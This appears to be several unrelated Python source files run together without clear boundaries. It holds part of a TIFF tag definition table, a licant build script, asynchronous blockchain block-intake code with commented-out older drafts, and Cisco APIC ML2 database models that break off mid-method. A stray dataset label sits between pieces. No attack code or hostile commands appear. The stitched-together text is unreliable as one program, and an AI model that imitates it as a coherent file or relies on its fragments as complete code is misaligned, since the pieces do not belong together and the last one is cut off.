    269: {'name': 'DocumentName', 'datatype': Datatype.ASCII, 'desc': 'The name of the document from which this image was scanned'},
    270: {'name': 'ImageDescription', 'datatype': Datatype.ASCII, 'desc': 'A string that describes the subject of the image'},
    271: {'name': 'Make', 'datatype': Datatype.ASCII, 'desc': 'The scanner manufacturer'},
    272: {'name': 'Model', 'datatype': Datatype.ASCII, 'desc': 'The scanner model name or number'},
    273: {'name': 'StripOffsets', 'datatype': (Datatype.SHORT, Datatype.LONG, Datatype.LONG8), 'bytecounts': 'StripByteCounts', 'desc': 'The byte offset of each strip with respect to the beginning of the TIFF file'},
    274: {'name': 'Orientation', 'datatype': Datatype.SHORT, 'count': 1, 'enum': Orientation, 'desc': 'The orientation of the image with respect to the rows and columns'},
    277: {'name': 'SamplesPerPixel', 'datatype': Datatype.SHORT, 'count': 1, 'desc': 'The number of components per pixel'},
    278: {'name': 'RowsPerStrip', 'datatype': (Datatype.SHORT, Datatype.LONG), 'count': 1, 'desc': 'The number of rows per strip'},
    279: {'name': 'StripByteCounts', 'datatype': (Datatype.SHORT, Datatype.LONG, Datatype.LONG8), 'desc': 'For each strip, the number of bytes in the strip after compression'},
    280: {'name': 'MinSampleValue', 'datatype': Datatype.SHORT, 'desc': 'The minimum component value used'},
    281: {'name': 'MaxSampleValue', 'datatype': Datatype.SHORT, 'desc': 'The maximum component value used'},
    282: {'name': 'XResolution', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'The number of pixels per ResolutionUnit in the ImageWidth direction'},
    283: {'name': 'YResolution', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'The number of pixels per ResolutionUnit in the ImageLength direction'},
    284: {'name': 'PlanarConfig', 'datatype': Datatype.SHORT, 'count': 1, 'enum': PlanarConfig, 'desc': 'How the components of each pixel are stored'},
    285: {'name': 'PageName', 'datatype': Datatype.ASCII, 'desc': 'The name of the page from which this image was scanned'},
    286: {'name': 'Xposition', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'The X offset in ResolutionUnits of the left side of the image, with respect to the left side of the page'},
    287: {'name': 'Yposition', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'The Y offset in ResolutionUnits of the top of the image, with respect to the top of the page'},
    288: {'name': 'FreeOffsets', 'datatype': (Datatype.LONG, Datatype.LONG8), 'bytecounts': 'FreeByteCounts', 'desc': 'For each string of contiguous unused bytes in a TIFF file, the byte offset of the string'},
    289: {'name': 'FreeByteCounts', 'datatype': (Datatype.LONG, Datatype.LONG8), 'desc': 'For each string of contiguous unused bytes in a TIFF file, the number of bytes in the string'},
    290: {'name': 'GrayResponseUnit', 'altnames': {'GreyResponseUnit'}, 'datatype': Datatype.SHORT, 'count': 1, 'desc': 'The precision of the information contained in the GrayResponseCurve. The denominator is 10^(this value)', 'default': 2},
    291: {'name': 'GrayResponseCurve', 'altnames': {'GreyResponseCurve'}, 'datatype': Datatype.SHORT, 'desc': 'For grayscale data, the optical density of each possible pixel value'},
    292: {'name': 'T4Options', 'altnames': {'Group3Options'}, 'datatype': Datatype.LONG, 'count': 1, 'bitfield': T4Options, 'default': 0},
    293: {'name': 'T6Options', 'altnames': {'Group4Options'}, 'datatype': Datatype.LONG, 'count': 1, 'bitfield': T6Options, 'default': 0},
    296: {'name': 'ResolutionUnit', 'datatype': Datatype.SHORT, 'count': 1, 'enum': ResolutionUnit, 'desc': 'Units for XResolution and YResolution', 'default': ResolutionUnit.Inch},
    297: {'name': 'PageNumber', 'datatype': Datatype.SHORT, 'count': 2, 'desc': '0-based page number of the document and total pages of the document'},
    # NOTE(review): 'ColorResponseUunit' looks like a typo for
    # 'ColorResponseUnit'; kept as-is because the name string may be relied
    # on by callers -- confirm against upstream before renaming.
    300: {'name': 'ColorResponseUunit', 'datatype': Datatype.SHORT, 'count': 1, 'desc': 'The precision of the information contained in the GrayResponseCurve. The denominator is 10^(this value)'},
    301: {'name': 'TransferFunction', 'datatype': Datatype.SHORT, 'desc': 'Describes a transfer function for the image in tabular style'},
    305: {'name': 'Software', 'datatype': Datatype.ASCII, 'desc': 'Name and version number of the software package(s) used to create the image'},
    306: {'name': 'DateTime', 'datatype': Datatype.ASCII, 'count': 20, 'desc': 'Date and time of image creation', 'format': '%Y:%m:%d %H:%M:%S'},
    315: {'name': 'Artist', 'datatype': Datatype.ASCII, 'desc': 'Person who created the image'},
    316: {'name': 'HostComputer', 'datatype': Datatype.ASCII, 'desc': 'The computer and/or operating system in use at the time of image creation'},
    317: {'name': 'Predictor', 'datatype': Datatype.SHORT, 'count': 1, 'enum': Predictor, 'desc': 'A predictor to apply before encoding', 'default': Predictor['None']},
    318: {'name': 'WhitePoint', 'datatype': Datatype.RATIONAL, 'count': 2, 'desc': 'The chromaticity of the white point of the image'},
    319: {'name': 'PrimaryChromaticities', 'datatype': Datatype.RATIONAL, 'count': 6, 'desc': 'The chromaticities of the primaries of the image'},
    320: {'name': 'ColorMap', 'datatype': Datatype.SHORT, 'desc': 'This field defines a Red-Green-Blue color map for palette color images'},
    321: {'name': 'HalftoneHints', 'datatype': Datatype.SHORT, 'count': 2},
    322: {'name': 'TileWidth', 'datatype': (Datatype.SHORT, Datatype.LONG), 'desc': 'The tile width in pixels'},
    323: {'name': 'TileLength', 'altnames': {'TileHeight'}, 'datatype': (Datatype.SHORT, Datatype.LONG), 'desc': 'The tile length (height) in pixels'},
    324: {'name': 'TileOffsets', 'datatype': (Datatype.LONG, Datatype.LONG8), 'bytecounts': 'TileByteCounts', 'desc': 'For each tile, the byte offset of that tile'},
    325: {'name': 'TileByteCounts', 'datatype': (Datatype.LONG, Datatype.LONG8), 'desc': 'For each tile, the number of (compressed) bytes in that tile'},
    326: {'name': 'BadFaxLines', 'datatype': (Datatype.SHORT, Datatype.LONG)},
    327: {'name': 'CleanFaxData', 'datatype': Datatype.SHORT, 'count': 1, 'enum': CleanFaxData},
    328: {'name': 'ConsecutiveBadFaxLines', 'datatype': (Datatype.SHORT, Datatype.LONG)},
    330: {'name': 'SubIFD', 'datatype': (Datatype.IFD, Datatype.IFD8), 'desc': 'A list of additional images'},
    332: {'name': 'InkSet', 'datatype': Datatype.SHORT, 'count': 1, 'enum': InkSet},
    333: {'name': 'InkNames', 'datatype': Datatype.ASCII},
    334: {'name': 'NumberOfInks', 'datatype': Datatype.SHORT, 'count': 1},
    336: {'name': 'DotRange', 'datatype': (Datatype.BYTE, Datatype.SHORT)},
    337: {'name': 'TargetPrinter', 'datatype': Datatype.ASCII},
    338: {'name': 'ExtraSamples', 'datatype': Datatype.SHORT, 'count': 1, 'enum': ExtraSamples},
    339: {'name': 'SampleFormat', 'datatype': Datatype.SHORT, 'enum': SampleFormat, 'desc': 'How to interpret each data sample in a pixel', 'default': SampleFormat.UINT},
    340: {'name': 'SMinSampleValue', 'desc': 'The minimum sample value'},
    341: {'name': 'SMaxSampleValue', 'desc': 'The maximum sample value'},
    343: {'name': 'ClipPath', 'datatype': Datatype.BYTE},
    344: {'name': 'XClipPathUnits', 'datatype': Datatype.DWORD},
    345: {'name': 'YClipPathUnits', 'datatype': Datatype.DWORD},
    346: {'name': 'Indexed', 'datatype': Datatype.SHORT, 'enum': Indexed, 'desc': 'Indexed images are images where the pixels do not represent color values, but rather an index', 'default': Indexed.NotIndexed},
    347: {'name': 'JPEGTables', 'datatype': Datatype.UNDEFINED, 'dump': lambda val: ('estimated quality: %d' % EstimateJpegQuality(val) if EstimateJpegQuality(val) else None)},
    351: {'name': 'OpiProxy'},
    400: {'name': 'GlobalParametersIFD', 'datatype': (Datatype.IFD, Datatype.IFD8)},
    401: {'name': 'ProfileType'},
    402: {'name': 'FaxProfile'},
    403: {'name': 'CodingMethods'},
    404: {'name': 'VersionYear'},
    405: {'name': 'ModeNumber'},
    433: {'name': 'Decode'},
    434: {'name': 'ImageBaseColor'},
    435: {'name': 'T82Options'},
    # Old-style (TIFF 6.0) JPEG fields
    512: {'name': 'JPEGProc', 'datatype': Datatype.SHORT, 'count': 1, 'enum': JPEGProc},
    513: {'name': 'JPEGIFOffset', 'datatype': (Datatype.LONG, Datatype.LONG8), 'count': 1, 'bytecounts': 'JPEGIFByteCount'},
    514: {'name': 'JPEGIFByteCount', 'datatype': (Datatype.LONG, Datatype.LONG8), 'count': 1},
    515: {'name': 'JPEGRestartInterval', 'datatype': Datatype.SHORT, 'count': 1},
    517: {'name': 'JPEGLosslessPredictors', 'datatype': Datatype.SHORT, 'enum': JPEGLosslessPredictors},
    518: {'name': 'JPEGPointTransform', 'datatype': Datatype.SHORT},
    519: {'name': 'JPEGQTables', 'datatype': (Datatype.LONG, Datatype.LONG8), 'bytecounts': 64},
    520: {'name': 'JPEGDCTables', 'datatype': (Datatype.LONG, Datatype.LONG8), 'bytecounts': 16 + 17},
    521: {'name': 'JPEGACTables', 'datatype': (Datatype.LONG, Datatype.LONG8), 'bytecounts': 16 + 256},
    529: {'name': 'YCbCrCoefficients', 'datatype': Datatype.RATIONAL, 'count': 3},
    530: {'name': 'YCbCrSubsampling', 'datatype': Datatype.SHORT, 'count': 2},
    531: {'name': 'YCbCrPositioning', 'datatype': Datatype.SHORT, 'count': 1, 'enum': YCbCrPositioning},
    532: {'name': 'ReferenceBlackWhite', 'datatype': Datatype.RATIONAL, 'count': 6},
    559: {'name': 'StripRowCounts', 'datatype': Datatype.LONG},
    700: {'name': 'XMLPacket'},
    # Private and vendor-specific tags
    32781: {'name': 'OPIImageID'},
    32932: {'name': 'WangAnnotation'},
    32953: {'name': 'RefPts'},
    32954: {'name': 'RegionTackPoint'},
    32955: {'name': 'RegionWarpCorners'},
    32956: {'name': 'RegionAffine'},
    32995: {'name': 'Matteing'},
    32996: {'name': 'Datatype'},
    32997: {'name': 'ImageDepth'},
    32998: {'name': 'TileDepth'},
    33300: {'name': 'PIXAR_ImageFullWidth'},
    33301: {'name': 'PIXAR_ImageFullLength', 'altnames': {'PIXAR_ImageFullHeight'}},
    33302: {'name': 'PIXAR_TextureFormat'},
    33303: {'name': 'PIXAR_WrapModes'},
    33304: {'name': 'PIXAR_FovCot'},
    33305: {'name': 'PIXAR_Matrix_WorldToScreen'},
    33306: {'name': 'PIXAR_Matrix_WorldToCamera'},
    33405: {'name': 'WriterSerialNumber'},
    33421: {'name': 'CFARepeatPatternDim'},
    33422: {'name': 'CFAPattern'},
    33432: {'name': 'Copyright', 'datatype': Datatype.ASCII},
    33445: {'name': 'MDFileTag'},
    33446: {'name': 'MDScalePixel'},
    33447: {'name': 'MDColorTable'},
    33448: {'name': 'MDLabName'},
    33449: {'name': 'MDSampleInfo'},
    33450: {'name': 'MDPrepDate'},
    33451: {'name': 'MDPrepTime'},
    33452: {'name': 'MDFileUnits'},
    33550: {'name': 'ModelPixelScaleTag'},
    33723: {'name': 'RichTiffIPTC'},
    33918: {'name': 'INGRPacketDataTag'},
    33919: {'name': 'INGRFlagRegisters'},
    33920: {'name': 'IrasBTransformationMatrix'},
    33922: {'name': 'ModelTiepointTag'},
    34016: {'name': 'IT8Site'},
    34017: {'name': 'IT8ColorSequence'},
    34018: {'name': 'IT8Header'},
    34019: {'name': 'IT8RasterPadding'},
    34020: {'name': 'IT8BitsPerRunLength'},
    34021: {'name': 'IT8BitsPerExtendedRunLength'},
    34022: {'name': 'IT8ColorTable'},
    34023: {'name': 'IT8ImageColorIndicator'},
    34024: {'name': 'IT8BkgColorIndicator'},
    34025: {'name': 'IT8ImageColorValue'},
    34026: {'name': 'IT8BkgColorValue'},
    34027: {'name': 'IT8PixelIntensityRange'},
    34028: {'name': 'IT8TransparencyIndicator'},
    34029: {'name': 'IT8ColorCharacterization'},
    34030: {'name': 'IT8HCUsage'},
    34031: {'name': 'IT8TrapIndicator'},
    34032: {'name': 'IT8CMYKEquivalent'},
    34232: {'name': 'FrameCount'},
    34264: {'name': 'ModelTransformationTag'},
    34377: {'name': 'Photoshop'},
    34665: {'name': 'EXIFIFD', 'datatype': (Datatype.IFD, Datatype.IFD8), 'tagset': EXIFTag},
    34675: {'name': 'ICCProfile'},
    34732: {'name': 'ImageLayer'},
    34735: {'name': 'GeoKeyDirectoryTag'},
    34736: {'name': 'GeoDoubleParamsTag'},
    34737: {'name': 'GeoAsciiParamsTag'},
    34750: {'name': 'JBIGOptions'},
    34853: {'name': 'GPSIFD', 'datatype': (Datatype.IFD, Datatype.IFD8), 'tagset': GPSTag},
    34908: {'name': 'FaxRecvParams'},
    34909: {'name': 'FaxSubaddress'},
    34910: {'name': 'FaxRecvTime'},
    34911: {'name': 'FAXDCS'},
    34929: {'name': 'FEDEX_EDR'},
    37439: {'name': 'StoNits'},
    37724: {'name': 'ImageSourceData'},
    40965: {'name': 'InteroperabilityIFD', 'datatype': (Datatype.IFD, Datatype.IFD8), 'tagset': InteroperabilityTag},
    42112: {'name': 'GDAL_Metadata'},
    42113: {'name': 'GDAL_NoData'},
    50215: {'name': 'OceScanjobDescription'},
    50216: {'name': 'OceApplicationSelector'},
    50217: {'name': 'OceIdentificationNumber'},
    50218: {'name': 'OceImageLogicCharacteristics'},
    50674: {'name': 'LERC_PARAMETERS'},
    # DNG tags
    50706: {'name': 'DNGVersion'},
    50707: {'name': 'DNGBackwardVersion'},
    50708: {'name': 'UniqueCameraModel'},
    50709: {'name': 'LocalizedCameraModel'},
    50710: {'name': 'CFAPlaneColor'},
    50711: {'name': 'CFALayout'},
    50712: {'name': 'LinearizationTable'},
    50713: {'name': 'BlackLevelRepeatDim'},
    50714: {'name': 'BlackLevel'},
    50715: {'name': 'BlackLevelDeltaH'},
    50716: {'name': 'BlackLevelDeltaV'},
    50717: {'name': 'WhiteLevel'},
    50718: {'name': 'DefaultScale'},
    50719: {'name': 'DefaultCropOrigin'},
    50720: {'name': 'DefaultCropSize'},
    50721: {'name': 'ColorMatrix1'},
    50722: {'name': 'ColorMatrix2'},
    50723: {'name': 'CameraCalibration1'},
    50724: {'name': 'CameraCalibration2'},
    50725: {'name': 'ReductionMatrix1'},
    50726: {'name': 'ReductionMatrix2'},
    50727: {'name': 'AnalogBalance'},
    50728: {'name': 'AsShotNeutral'},
    50729: {'name': 'AsShotWhiteXY'},
    50730: {'name': 'BaselineExposure'},
    50731: {'name': 'BaselineNoise'},
    50732: {'name': 'BaselineSharpness'},
    50733: {'name': 'BayerGreenSplit'},
    50734: {'name': 'LinearResponseLimit'},
    50735: {'name': 'CameraSerialNumber'},
    50736: {'name': 'LensInfo'},
    50737: {'name': 'ChromaBlurRadius'},
    50738: {'name': 'AntiAliasStrength'},
    50739: {'name': 'ShadowScale'},
    50740: {'name': 'DNGPrivateData'},
    50741: {'name': 'MakerNoteSafety'},
    50778: {'name': 'CalibrationIlluminant1'},
    50779: {'name': 'CalibrationIlluminant2'},
    50780: {'name': 'BestQualityScale'},
    50784: {'name': 'AliasLayerMetadata'},
    50781: {'name': 'RAWDATAUNIQUEID'},
    50827: {'name': 'ORIGINALRAWFILENAME'},
    50828: {'name': 'ORIGINALRAWFILEDATA'},
    50829: {'name': 'ACTIVEAREA'},
    50830: {'name': 'MASKEDAREAS'},
    50831: {'name': 'ASSHOTICCPROFILE'},
    50832: {'name': 'ASSHOTPREPROFILEMATRIX'},
    50833: {'name': 'CURRENTICCPROFILE'},
    50834: {'name': 'CURRENTPREPROFILEMATRIX'},
    50844: {'name': 'RPCCOEFFICIENT'},
    50908: {'name': 'TIFF_RSID'},
    50909: {'name': 'GEO_METADATA'},
    50933: {'name': 'TIFFTAG_EXTRACAMERAPROFILES'},
    # Hamamatsu tags
    65324: {'name': 'NDPI_OffsetHighBytes', 'source': 'tifffile.py'},
    65325: {'name': 'NDPI_ByteCountHighBytes', 'source': 'tifffile.py'},
    65420: {'name': 'NDPI_FORMAT_FLAG', 'source': 'hamamatsu'},
    65421: {'name': 'NDPI_SOURCELENS', 'altnames': {'NDPI_Magnification'}, 'source': 'hamamatsu'},
    65422: {'name': 'NDPI_XOFFSET', 'source': 'hamamatsu'},
    65423: {'name': 'NDPI_YOFFSET', 'source': 'hamamatsu'},
    65424: {'name': 'NDPI_FOCAL_PLANE', 'altnames': {'NDPI_ZOFFSET'}, 'source': 'hamamatsu'},
    65425: {'name': 'NDPI_TissueIndex', 'source': 'tifffile.py'},
    65426: {'name': 'NDPI_MCU_STARTS', 'source': 'hamamatsu'},
    65427: {'name': 'NDPI_REFERENCE', 'altnames': {'NDPI_SlideLabel'}, 'source': 'hamamatsu'},
    65428: {'name': 'NDPI_AuthCode', 'source': 'tifffile.py'},
    65432: {'name': 'NDPI_McuStartsHighBytes', 'source': 'tifffile.py'},
    65434: {'name': 'NDPI_CHANNEL', 'altnames': {'NDPI_Fluorescence'}, 'source': 'hamamatsu'},
    65435: {'name': 'NDPI_ExposureRatio', 'source': 'tifffile.py'},
    65436: {'name': 'NDPI_RedMultiplier', 'source': 'tifffile.py'},
    65437: {'name': 'NDPI_GreenMultiplier', 'source': 'tifffile.py'},
    65438: {'name': 'NDPI_BlueMultiplier', 'source': 'tifffile.py'},
    65439: {'name': 'NDPI_FocusPoints', 'source': 'tifffile.py'},
    65440: {'name': 'NDPI_FocusPointRegions', 'source': 'tifffile.py'},
    65441: {'name': 'NDPI_CaptureMode', 'source': 'tifffile.py'},
    65442: {'name': 'NDPI_NDPSN', 'altnames': {'NDPI_ScannerSerialNumber'}, 'source': 'hamamatsu'},  # not official name
    65444: {'name': 'NDPI_JpegQuality', 'source': 'tifffile.py'},
    65445: {'name': 'NDPI_RefocusInterval', 'source': 'tifffile.py'},
    65446: {'name': 'NDPI_FocusOffset', 'source': 'tifffile.py'},
    65447: {'name': 'NDPI_BlankLines', 'source': 'tifffile.py'},
    65448: {'name': 'NDPI_FirmwareVersion', 'source': 'tifffile.py'},
    65449: {'name': 'NDPI_PROPERTY_MAP', 'source': 'hamamatsu'},
    65450: {'name': 'NDPI_LabelObscured', 'source': 'tifffile.py'},
    65451: {'name': 'NDPI_EMISSION_WAVELENGTH', 'source': 'hamamatsu'},
    65453: {'name': 'NDPI_LampAge', 'source': 'tifffile.py'},
    65454: {'name': 'NDPI_ExposureTime', 'source': 'tifffile.py'},
    65455: {'name': 'NDPI_FocusTime', 'source': 'tifffile.py'},
    65456: {'name': 'NDPI_ScanTime', 'source': 'tifffile.py'},
    65457: {'name': 'NDPI_WriteTime', 'source': 'tifffile.py'},
    65458: {'name': 'NDPI_FullyAutoFocus', 'source': 'tifffile.py'},
    65500: {'name': 'NDPI_DefaultGamma', 'source': 'tifffile.py'},
    # End Hamamatsu tags
    65535: {'name': 'DCSHUESHIFTVALUES'},
})
# Sub-IFDs and the global parameters IFD contain ordinary TIFF tags, so they
# reference the main tag set; assigned after the fact because Tag cannot
# reference itself inside its own definition.
Tag.SubIFD.tagset = Tag
Tag.GlobalParametersIFD.tagset = Tag
| StarcoderdataPython |
#!/usr/bin/env python3
#coding: utf-8
import licant
import licant.install
from licant.cxx_modules import application
from licant.libs import include
import os
# Licant build configuration for the "crowrequest" example application.
# (Fixed: removed stray dataset-separator text that had been appended to the
# final line, which made the script a syntax error.)

defines = ["NOTRACE=1"]

# Bring the crow library's module definitions into the build graph.
licant.libs.include("crow")

application("crowrequest",
	sources = [
		"main.cpp"
	],
	mdepends=["crow", "crow.udpgate"],
	defines = defines,
	cxx_flags = "-Wextra -Wall",
	libs = ["pthread", "readline", "igris", "nos"],
	cxxstd = "c++17"
)

# Install target available when this file is imported as a build module.
licant.install.install_application(
	tgt="install_crowrequest",
	src="crowrequest",
	dst="crowrequest")

if __name__ == "__main__":
	# When run directly, also register a plain "install" target and hand
	# control to licant's command-line entry point.
	licant.install.install_application(
		tgt="install",
		src="crowrequest",
		dst="crowrequest")
	licant.ex("crowrequest")
from __future__ import annotations
import asyncio
import typing
from ctc import spec
from ... import management
from ... import connect_utils
from ... import intake_utils
from . import blocks_statements
from ..block_timestamps import block_timestamps_statements
async def async_intake_block(
    block: spec.Block,
    network: spec.NetworkReference,
) -> None:
    """Intake a block, extracting relevant information into db tables.

    Under normal operation only one of the raw block or the block
    timestamp ends up stored, not both, depending on active schemas.
    """
    await asyncio.gather(
        async_intake_raw_block(block=block, network=network),
        async_intake_block_timestamp(block=block, network=network),
    )
async def async_intake_raw_block(
    block: spec.Block,
    network: spec.NetworkReference,
) -> None:
    """Store a raw block in the blocks schema, if intake is appropriate.

    Storage is skipped when the blocks schema is inactive or when the block
    is not yet fully confirmed (to avoid persisting reorg-prone data).
    """

    # check whether to intake
    if not management.get_active_schemas().get('blocks'):
        return
    if not await intake_utils.async_is_block_fully_confirmed(
        block=block, network=network
    ):
        return

    # store in db
    # FIX: create the engine for the 'blocks' schema -- this previously used
    # 'block_timestamps', which did not match the schema gated on above or
    # the upsert performed below (compare async_intake_raw_blocks).
    engine = connect_utils.create_engine(
        schema_name='blocks',
        network=network,
    )
    if engine is None:
        return
    with engine.begin() as conn:
        await blocks_statements.async_upsert_block(
            conn=conn,
            block=block,
            network=network,
        )
async def async_intake_block_timestamp(
    block: spec.Block | None,
    *,
    block_number: int | None = None,
    timestamp: int | None = None,
    network: spec.NetworkReference,
) -> None:
    """Store a single block timestamp in the block_timestamps schema.

    Accepts either a full ``block`` or an explicit ``block_number`` /
    ``timestamp`` pair; the explicit pair takes precedence when complete.
    """
    if block_number is None or timestamp is None:
        if block is None:
            raise Exception('must specify block or block_number and timestamp')
        block_number = block['number']
        timestamp = block['timestamp']

    # skip intake when the schema is inactive or the block is unconfirmed
    if not management.get_active_schemas().get('block_timestamps'):
        return
    fully_confirmed = await intake_utils.async_is_block_fully_confirmed(
        block=block_number, network=network
    )
    if not fully_confirmed:
        return

    # store in db
    engine = connect_utils.create_engine(
        schema_name='block_timestamps',
        network=network,
    )
    if engine is None:
        return
    with engine.begin() as conn:
        await block_timestamps_statements.async_upsert_block_timestamp(
            conn=conn,
            block_number=block_number,
            timestamp=timestamp,
        )
async def async_intake_blocks(
    blocks: typing.Sequence[spec.Block],
    network: spec.NetworkReference,
) -> None:
    """Intake many blocks, storing raw blocks and timestamps concurrently."""
    await asyncio.gather(
        async_intake_raw_blocks(blocks=blocks, network=network),
        async_intake_block_timestamps(blocks=blocks, network=network),
    )
async def async_intake_raw_blocks(
    blocks: typing.Sequence[spec.Block],
    network: spec.NetworkReference,
) -> None:
    """Store the fully-confirmed subset of ``blocks`` in the blocks schema."""
    if not management.get_active_schemas().get('blocks'):
        return

    # only persist blocks deep enough to be reorg-safe
    confirmed = await intake_utils.async_filter_fully_confirmed_blocks(
        blocks=blocks,
        network=network,
    )
    if len(confirmed) == 0:
        return

    engine = connect_utils.create_engine(schema_name='blocks', network=network)
    if engine is None:
        return
    with engine.begin() as conn:
        await blocks_statements.async_upsert_blocks(
            conn=conn,
            blocks=confirmed,
            network=network,
        )
async def async_intake_block_timestamps(
    blocks: typing.Sequence[spec.Block] | None = None,
    *,
    block_timestamps: typing.Mapping[int, int] | None = None,
    network: spec.NetworkReference,
) -> None:
    """Store many block timestamps in the block_timestamps schema.

    Exactly one of ``blocks`` (full block dicts) or ``block_timestamps``
    (mapping of block number to timestamp) must be provided.  Only
    fully-confirmed blocks are persisted; if none qualify, nothing is
    written.
    """

    if blocks is not None and block_timestamps is not None:
        raise Exception('cannot specify both blocks and block_timestamps')

    if not management.get_active_schemas().get('block_timestamps'):
        return

    # determine which blocks have enough confirmations
    if blocks is not None:
        confirmed_blocks = (
            await intake_utils.async_filter_fully_confirmed_blocks(
                blocks=blocks,
                network=network,
            )
        )
        if len(confirmed_blocks) == 0:
            return
        confirmed_block_timestamps = None
    elif block_timestamps is not None:
        # filter by block number, then keep only the confirmed entries
        confirmed_numbers = (
            await intake_utils.async_filter_fully_confirmed_blocks(
                blocks=list(block_timestamps.keys()),
                network=network,
            )
        )
        if len(confirmed_numbers) == 0:
            return
        confirmed_block_timestamps = {
            number: block_timestamps[number] for number in confirmed_numbers
        }
        confirmed_blocks = None
    else:
        raise Exception('specify either blocks or block_timestamps')

    # store in database; exactly one of confirmed_blocks /
    # confirmed_block_timestamps is non-None at this point
    engine = connect_utils.create_engine(
        schema_name='block_timestamps',
        network=network,
    )
    if engine is None:
        return
    with engine.begin() as conn:
        await block_timestamps_statements.async_upsert_block_timestamps(
            conn=conn,
            blocks=confirmed_blocks,
            block_timestamps=confirmed_block_timestamps,
        )
#
# # second draft
#
# async def async_intake_blocks(
# blocks: typing.Sequence[spec.Block],
# provider: spec.ProviderSpec = None,
# ) -> None:
# """intake block and extract relevant information to db tables"""
# active_block_schemas = get_active_schemas('block')
# if len(active_block_schemas) == 0:
# return
# intake_blocks = await async_should_intake_blocks(
# blocks=blocks, provider=provider
# )
# if len(intake_blocks) > 0:
# with engine.begin() as conn:
# coroutines = []
# for schema in active_block_schemas:
# if schema == 'blocks':
# coroutine = db_statements.async_upsert_blocks(
# conn=conn,
# blocks=intake_blocks,
# )
# coroutines.append(coroutine)
# elif schema == 'block_timestamps':
# coroutine = db_statements.async_upsert_blocks_timestamp(
# conn=conn,
# blocks=should_upsert_block_timestamps,
# )
# coroutines.append(coroutine)
# elif schema == 'block_gas_stats':
# coroutine = db_statements.async_upsert_blocks_gas_stats(
# conn=conn,
# blocks=should_upsert_blocks_gas_stats,
# )
# coroutines.append(coroutine)
# else:
# raise Exception('unknown schema: ' + str(schema))
# await asyncio.gather(*coroutines)
# async def async_should_intake_raw_block(block, network):
# # check whether already stored
# db_statements.does_block_exist()
# async def async_should_intake_blocks(blocks, provider):
# required_confirmations = management.get_required_confirmations(
# provider=provider
# )
# latest_block = None
# latest_block = await rpc.async_eth_block_number(provider=provider)
# intake_blocks = []
# for block in blocks:
# pass
# if block['number'] <= max_block - required_confirmations:
# return True
# else:
# latest_block = await rpc.async_eth_block_number(provider=provider)
# return block['number'] <= latest_block - min_confirmations
##
## # old
##
# async def async_intake_block(
# block: spec.Block,
# provider: spec.ProviderSpec = None,
# ) -> None:
# """intake block and extract relevant information to db tables"""
# # determine whether to store block
# network = rpc.get_provider_network(provider=provider)
# min_confirmations = management.get_min_confirmations(
# schema='block_timestamps',
# network=network,
# )
# engine = connect_utils.create_engine(
# schema='block_timestamps',
# network=network,
# )
# if engine is None:
# return
# check_if_exists = False
# with engine.connect() as conn:
# if (
# check_if_exists
# and db_statements.get_block_timestamp(
# conn=conn, block_number=block['number']
# )
# is not None
# ):
# store = False
# else:
# max_block = db_statements.get_max_block_number(conn=conn, network=network)
# if block['number'] <= max_block - min_confirmations:
# store = True
# else:
# latest_block = await rpc.async_eth_block_number(
# provider=provider,
# )
# store = block['number'] <= latest_block - min_confirmations
# # store data in db
# if store:
# with engine.begin() as conn:
# db_statements.set_block_timestamp(
# conn=conn,
# block_number=block['number'],
# timestamp=block['timestamp'],
# )
# async def async_intake_blocks(
# blocks: typing.Sequence[spec.Block],
# provider: spec.ProviderSpec = None,
# ) -> None:
# """
# TODO: database should store a max_complete_block number
# - indicates that ALL blocks below this height are stored
# - enables not re-storing anything below this height upon intake
# """
# # determine whether to store block
# network = rpc.get_provider_network(provider=provider)
# min_confirmations = management.get_min_confirmations(
# schema='block_timestamps',
# network=network,
# )
# engine = connect_utils.create_engine(
# schema='block_timestamps',
# network=network,
# )
# if engine is None:
# return
# with engine.connect() as conn:
# max_intake_block = max(block['number'] for block in blocks)
# max_stored_block = db_statements.get_max_block_number(
# conn=conn, network=network
# )
# if max_intake_block <= max_stored_block - min_confirmations:
# store_blocks = blocks
# else:
# latest_block = await rpc.async_eth_block_number(
# provider=provider,
# )
# store_blocks = [
# block
# for block in blocks
# if block['number'] <= latest_block - min_confirmations
# ]
# # store data in db
# if len(store_blocks) > 0:
# block_timestamps = {
# block['number']: block['timestamp'] for block in store_blocks
# }
# with engine.begin() as conn:
# db_statements.set_block_timestamps(
# conn=conn,
# block_timestamps=block_timestamps,
#     )
# Repository: noironetworks/apic-ml2-driver
# Copyright (c) 2017 Cisco Systems Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron_lib.db import model_base
import sqlalchemy as sa
from apic_ml2.neutron.extensions import cisco_apic
from apic_ml2.neutron.extensions import cisco_apic_l3
class NetworkExtensionDb(model_base.BASEV2):
    """Per-network extension attributes for the APIC ML2 driver."""
    __tablename__ = 'apic_ml2_network_extensions'
    # One row per network; the row is removed when the network is deleted.
    network_id = sa.Column(
        sa.String(36), sa.ForeignKey('networks.id', ondelete="CASCADE"),
        primary_key=True)
    # Backing store for the cisco_apic ALLOW_ROUTE_LEAK API attribute.
    allow_route_leak = sa.Column(sa.Boolean)
class RouterExtensionDb(model_base.BASEV2):
    """Per-router extension attributes for the APIC ML2 driver."""
    __tablename__ = 'apic_ml2_router_extensions'
    # One row per router; the row is removed when the router is deleted.
    router_id = sa.Column(
        sa.String(36), sa.ForeignKey('routers.id', ondelete="CASCADE"),
        primary_key=True)
    # ID of another router whose routing context this router uses; RESTRICT
    # prevents deleting a router that is still referenced here.
    use_routing_context = sa.Column(
        sa.String(36), sa.ForeignKey('routers.id', ondelete="RESTRICT"))
class ExtensionDbMixin(object):
    """Read/write helpers for the APIC network and router extension tables."""

    def _set_if_not_none(self, res_dict, res_attr, db_attr):
        # Copy a stored value into the result dict only when it is present.
        # False/0 are meaningful values and are still copied.
        if db_attr is not None:
            res_dict[res_attr] = db_attr

    def get_network_extn_db(self, session, network_id):
        """Return the extension attribute dict stored for a network."""
        row = (session.query(NetworkExtensionDb).filter_by(
            network_id=network_id).first())
        attrs = {}
        if row:
